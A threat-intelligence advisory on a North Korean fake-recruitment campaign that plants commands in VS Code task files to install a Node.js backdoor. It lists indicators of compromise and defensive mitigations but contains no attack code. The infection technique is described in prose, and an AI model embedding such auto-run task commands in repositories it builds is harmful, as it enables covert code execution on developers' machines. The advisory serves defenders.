This threat involves North Korean state-sponsored actors evolving their Contagious Interview campaign by abusing Microsoft Visual Studio Code's task configuration files to execute malicious commands. The infection chain starts when a victim, typically targeted through a fake recruitment process, clones or opens a malicious Git repository containing specially crafted VS Code task files. When the victim grants trust to these tasks, arbitrary commands embedded in the task configuration are executed on the local system. The attackers use JavaScript payloads hosted on the vercel.app platform to implement a backdoor with capabilities including remote code execution, system fingerprinting, and persistent command-and-control communication. The backdoor collects detailed host information and sends beacon signals to a C2 server every five seconds, ensuring continuous control and data exfiltration. The campaign primarily targets macOS systems and abuses popular developer platforms such as GitHub and GitLab to lure victims. The malware leverages Node.js and JavaScript execution techniques (T1059.007, T1059.005) and employs obfuscation (T1027) and persistence mechanisms (T1105). Indicators include multiple file hashes, an IP address (87.236.177.9), and a domain (srv37746.hosted-by-eurohoster.org). Although no CVE or known exploits in the wild are reported, the sophistication and persistence of the campaign indicate a medium-level threat with potential for escalation.

For European organizations, especially those involved in software development, recruitment, and technology sectors, this threat poses significant risks. The abuse of VS Code task files can lead to unauthorized remote code execution, allowing attackers to gain persistent access to sensitive systems. This compromises confidentiality by enabling data theft, including intellectual property and personal information. Integrity is at risk as attackers can modify or inject malicious code into development environments. Availability could be affected if attackers deploy destructive payloads or disrupt operations. The use of legitimate developer tools and platforms like GitHub and GitLab increases the likelihood of successful social engineering attacks, particularly in organizations with remote or hybrid workforces. The persistent C2 communication every five seconds facilitates ongoing espionage and lateral movement within networks. European organizations with macOS endpoints and those relying heavily on VS Code are particularly vulnerable. The campaign's disguise as recruitment processes may also target HR departments, increasing the attack surface.

1. Enforce strict policies on trusting VS Code workspace and task configuration files, especially from unknown or unverified Git repositories. 2. Educate employees, particularly in HR and development teams, about the risks of interacting with unsolicited recruitment-related repositories. 3. Implement endpoint detection and response (EDR) solutions capable of monitoring and alerting on suspicious VS Code task executions and Node.js script activities. 4. Monitor network traffic for frequent beaconing patterns, especially connections to suspicious domains like vercel.app or IPs such as 87.236.177.9, and block or investigate anomalous C2 communications. 5. Use application allowlisting to restrict execution of unauthorized scripts and binaries. 6. Regularly audit and restrict permissions on developer tools and repositories to minimize exposure. 7. Integrate threat intelligence feeds to detect known indicators of compromise (IOCs) such as the provided hashes and domains. 8. Encourage multi-factor authentication and least privilege principles for access to development and recruitment platforms. 9. Maintain up-to-date backups and incident response plans tailored to supply chain and developer toolchain attacks.